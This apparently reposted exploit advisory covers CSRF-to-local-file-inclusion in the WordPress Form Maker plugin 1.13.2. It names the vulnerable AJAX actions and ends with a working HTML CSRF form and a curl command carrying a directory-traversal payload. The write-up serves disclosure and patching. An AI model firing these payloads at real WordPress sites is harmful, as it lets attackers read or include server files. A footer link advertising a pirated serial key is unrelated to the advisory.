首页 技术 正文
技术 2022年11月6日
0 收藏 676 点赞 381 浏览 3458 个字

# Title: Form Maker by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/form-maker
# Version: 1.13.2
# Tested on: WordPress 5.1

Description
———–

Plugin implements the following AJAX actions:

– `generete_csv`
– `generete_xml`
– `formmakerwdcaptcha`
– `formmakerwdmathcaptcha`
– `product_option`
– `FormMakerEditCountryinPopup`
– `FormMakerMapEditinPopup`
– `FormMakerIpinfoinPopup`
– `show_matrix`
– `FormMakerSubmits`
– `FormMakerSQLMapping`
– `select_data_from_db`
– `manage_fm`
– `FMShortocde`

All of them call the function `form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET[‘action’]` or
`$_POST[‘action’]` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET[‘action’]` and AJAX action in `$_POST[‘action’]`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET[‘action’]`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

Plugin also registers the following AJAX actions:

– `paypal_info`
– `checkpaypal`

Those seems like the are only available to PRO version users, yet they
also are vulnerable to this attack.

Additionally the following AJAX actions are registered in PRO version:

– `get_frontend_stats`
– `frontend_show_map`
– `frontend_show_matrix`
– `frontend_paypal_info`
– `frontend_generate_csv`
– `frontend_generate_xml`

Those have the function `form_maker_ajax_frontend` as a callback. All of
them are vulnerable to the aforementioned attack. What’s more
interesting about those is the fact that are available to non-registered
users also, making this attack directly exploitable, without using a
CSRF attack. In this case the vulnerable param is `$_REQUEST[‘page’]`.

——

PoC
### Using a CSRF attack

“`HTML

 <form method="post"
action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index">
<label>AJAX action:
<select name="action">
<optgroup label="Free version">
<option value="generete_csv">generete_csv</option>
<option value="generete_xml">generete_xml</option>
<option value="formmakerwdcaptcha">formmakerwdcaptcha</option>
<option value="formmakerwdmathcaptcha">formmakerwdmathcaptcha</option>
<option value="product_option">product_option</option>
<option value="FormMakerEditCountryinPopup">FormMakerEditCountryinPopup</option>
<option value="FormMakerMapEditinPopup">FormMakerMapEditinPopup</option>
<option value="FormMakerIpinfoinPopup">FormMakerIpinfoinPopup</option>
<option value="show_matrix">show_matrix</option>
<option value="FormMakerSubmits">FormMakerSubmits</option>
<option value="FormMakerSQLMapping">FormMakerSQLMapping</option>
<option value="select_data_from_db">select_data_from_db</option>
<option value="manage_fm">manage_fm</option>
<option value="FMShortocde">FMShortocde</option>
</optgroup>
<optgroup label="Pro Version">
<option value="paypal_info">paypal_info</option>
<option value="checkpaypal">checkpaypal</option>
<option value="get_frontend_stats">get_frontend_stats</option>
<option value="frontend_show_map">frontend_show_map</option>
<option value="frontend_show_matrix">frontend_show_matrix</option>
<option value="frontend_paypal_info">frontend_paypal_info</option>
<option value="frontend_generate_csv">frontend_generate_csv</option>
<option value="frontend_generate_xml">frontend_generate_xml</option>
</optgroup>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>

“`

### Without leveraging the CSRF vulnerability
“`sh

curl 'http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php'  -d 'action=get_frontend_stats&page=/../../../../../index'

“`

相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
日期:2022-11-24 点赞:878 阅读:9,077
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:807 阅读:5,552
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:569 阅读:6,401
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:733 阅读:6,176
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
日期:2022-11-24 点赞:512 阅读:7,813
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:4,896